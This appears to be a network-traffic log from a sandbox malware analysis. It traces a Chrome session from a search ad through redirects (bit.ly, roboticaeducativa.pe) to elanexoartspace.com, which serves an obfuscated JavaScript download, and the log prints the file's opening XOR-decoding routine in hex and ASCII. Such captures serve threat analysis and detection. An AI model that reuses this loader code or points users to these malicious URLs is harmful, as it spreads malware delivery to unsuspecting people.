Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	50.31.176.165	443	192.168.2.5	49719	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:19 UTC	13	IN	HTTP/1.1 200 OK Connection: close refresh: 0; URL=https://elanexoartspace.com/xeregry content-type: text/html; charset=UTF-8 content-length: 0 date: Tue, 14 Nov 2023 19:34:19 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49720	50.31.176.165	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:21 UTC	13	OUT	GET /favicon.ico HTTP/1.1 Host: www.roboticaeducativa.pe Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.roboticaeducativa.pe/za/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49721	68.66.224.58	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:21 UTC	14	OUT	GET /xeregry HTTP/1.1 Host: elanexoartspace.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://www.roboticaeducativa.pe/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	68.66.224.58	443	192.168.2.5	49721	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:22 UTC	15	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 14 Nov 2023 19:34:22 GMT Server: Apache Strict-Transport-Security: max-age=63072000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Location: https://elanexoartspace.com/xeregry/ Content-Length: 244 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-11-14 19:34:22 UTC	15	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 6c 61 6e 65 78 6f 61 72 74 73 70 61 63 65 2e 63 6f 6d 2f 78 65 72 65 67 72 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://elanexoartspace.com/xeregry/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49722	68.66.224.58	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:22 UTC	15	OUT	GET /xeregry/ HTTP/1.1 Host: elanexoartspace.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://www.roboticaeducativa.pe/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	142.251.33.78	443	192.168.2.5	49705	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:11 UTC	1	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-_84byVeF5xRwXttdwmhwYQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 14 Nov 2023 19:34:11 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 6161 X-Daystart: 41651 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-11-14 19:34:11 UTC	2	IN	Data Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 31 36 31 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 34 31 36 35 31 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6161" elapsed_seconds="41651"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2023-11-14 19:34:11 UTC	2	IN	Data Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
2023-11-14 19:34:11 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	50.31.176.165	443	192.168.2.5	49720	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:22 UTC	16	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Tue, 14 Nov 2023 19:34:22 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-11-14 19:34:22 UTC	16	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	68.66.224.58	443	192.168.2.5	49722	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:22 UTC	17	IN	HTTP/1.1 200 OK Date: Tue, 14 Nov 2023 19:34:22 GMT Server: Apache X-Powered-By: PHP/7.3.33 Content-Disposition: attachment; filename="BENT0568_5595179.js" Strict-Transport-Security: max-age=63072000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: application/octet-stream
2023-11-14 19:34:22 UTC	17	IN	Data Raw: 39 38 37 0d 0a 0a 66 75 6e 63 74 69 6f 6e 20 75 77 73 6c 77 71 28 7a 68 72 6e 70 63 2c 20 66 79 74 6c 67 70 29 20 7b 0a 20 20 20 20 76 61 72 20 61 74 74 6d 61 64 20 3d 20 27 27 3b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 7a 68 72 6e 70 63 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 61 74 74 6d 61 64 20 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 7a 68 72 6e 70 63 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 20 5e 20 66 79 74 6c 67 70 2e 63 68 61 72 43 6f 64 65 41 74 28 69 20 25 20 66 79 74 6c 67 70 2e 6c 65 6e 67 74 68 29 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20 61 74 74 6d 61 64 20 3b 0a 7d 3b 0a 66 75 6e 63 74 69 6f 6e 20 63 63 6c 62 66 69 28 75 6f Data Ascii: 987function uwslwq(zhrnpc, fytlgp) { var attmad = ''; for (var i = 0; i < zhrnpc.length; i++) { attmad += String.fromCharCode(zhrnpc.charCodeAt(i) ^ fytlgp.charCodeAt(i % fytlgp.length)); } return attmad ;};function cclbfi(uo

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49723	40.127.169.103	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:25 UTC	20	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fDOAoSFWx5mmdg3&MD=gSpGkpwc HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2023-11-14 19:34:25 UTC	20	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 46e9bce5-3259-4652-9b0b-9a70aead05ed MS-RequestId: 52b7fb5b-5fc7-4879-acce-4762b6488bc1 MS-CV: IACAQqPHYk+W6mzk.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 14 Nov 2023 19:34:25 GMT Connection: close Content-Length: 24490
2023-11-14 19:34:25 UTC	21	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2023-11-14 19:34:25 UTC	36	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49729	40.127.169.103	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:35:03 UTC	44	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fDOAoSFWx5mmdg3&MD=gSpGkpwc HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2023-11-14 19:35:04 UTC	45	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: c1e5ce95-bf8b-465f-99c3-04ffc7df14f0 MS-RequestId: b116be25-324e-40df-bb61-046acf1133ce MS-CV: XeOUONyxqk6oCX6e.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Tue, 14 Nov 2023 19:35:03 GMT Connection: close Content-Length: 25457
2023-11-14 19:35:04 UTC	45	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2023-11-14 19:35:04 UTC	61	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	172.217.14.205	443	192.168.2.5	49706	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:11 UTC	2	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 14 Nov 2023 19:34:11 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce--ICI3YTyLpKswRJFN0gfSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-11-14 19:34:11 UTC	4	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2023-11-14 19:34:11 UTC	4	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49710	142.251.211.238	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:13 UTC	4	OUT	GET /link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds HTTP/1.1 Host: clickserve.dartsearch.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	142.251.211.238	443	192.168.2.5	49710	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:13 UTC	5	IN	HTTP/1.1 302 Moved Temporarily Strict-Transport-Security: max-age=31536000; includeSubDomains Location: https://ad.doubleclick.net/ddm/clk/566760878;375740285;d;u=ds&sv1=78497888010&sv2=3399980907122207&sv3=1874347215042995942&sa_info=CJnpualNEJKxwJIBGM-k-ZwFIP7cx9u9BA==&gclid=CI_O7PidxIIDFc3NwgQduQkGNA;%3f///bit.ly/46ePuds?gclid=CI_O7PidxIIDFc3NwgQduQkGNA&gclsrc=ds Content-Type: text/html; charset=UTF-8 Date: Tue, 14 Nov 2023 19:34:13 GMT Expires: Tue, 14 Nov 2023 19:34:13 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-11-14 19:34:13 UTC	6	IN	Data Raw: 31 64 36 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 64 64 6d 2f 63 6c 6b 2f 35 36 36 37 36 30 38 37 38 3b 33 37 35 37 34 30 32 38 35 3b 64 3b 75 3d 64 73 26 61 6d 70 3b 73 76 31 3d 37 38 34 39 37 38 38 38 30 31 30 26 61 6d 70 3b 73 76 32 3d 33 33 39 39 39 38 Data Ascii: 1d6<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://ad.doubleclick.net/ddm/clk/566760878;375740285;d;u=ds&sv1=78497888010&sv2=339998

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49714	142.251.33.102	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:14 UTC	6	OUT	GET /ddm/clk/566760878;375740285;d;u=ds&sv1=78497888010&sv2=3399980907122207&sv3=1874347215042995942&sa_info=CJnpualNEJKxwJIBGM-k-ZwFIP7cx9u9BA==&gclid=CI_O7PidxIIDFc3NwgQduQkGNA;%3f///bit.ly/46ePuds?gclid=CI_O7PidxIIDFc3NwgQduQkGNA&gclsrc=ds HTTP/1.1 Host: ad.doubleclick.net Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	142.251.33.102	443	192.168.2.5	49714	C:\Program Files\Google\Chrome\Application\chrome.exe
